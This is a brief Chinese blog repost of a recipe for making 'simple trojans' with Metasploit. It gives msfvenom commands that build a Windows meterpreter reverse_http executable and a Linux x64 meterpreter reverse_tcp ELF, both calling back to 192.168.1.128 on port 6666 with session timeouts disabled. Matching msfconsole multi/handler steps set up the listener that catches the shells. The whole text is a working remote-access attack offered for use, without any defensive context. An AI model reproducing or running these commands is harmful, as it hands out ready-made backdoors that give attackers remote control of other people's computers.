其他分享
首页 > 其他分享> > msf生成简单木马

msf生成简单木马

作者:互联网

windows 木马

msfvenom -p windows/meterpreter/reverse_http lhost=192.168.1.128 lport=6666 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f exe>shell.exe

监听

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_http

set lhost=192.168.1.128

set lport=6666

exploit


生成linux木马

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.1.128 lport=6666 SessionCommunication=0 SessionExpirationTimeout=0 -f elf >shell.elf

监听

msfconsole

use exploit/multi/handler

set payload linux/x64/meterpreter/reverse_tcp

set lhost 192.168.1.128

set lport 6666

exploit

标签:set,lhost,6666,192.168,生成,exploit,木马,msf,meterpreter
来源: https://blog.csdn.net/qq_44881113/article/details/120104035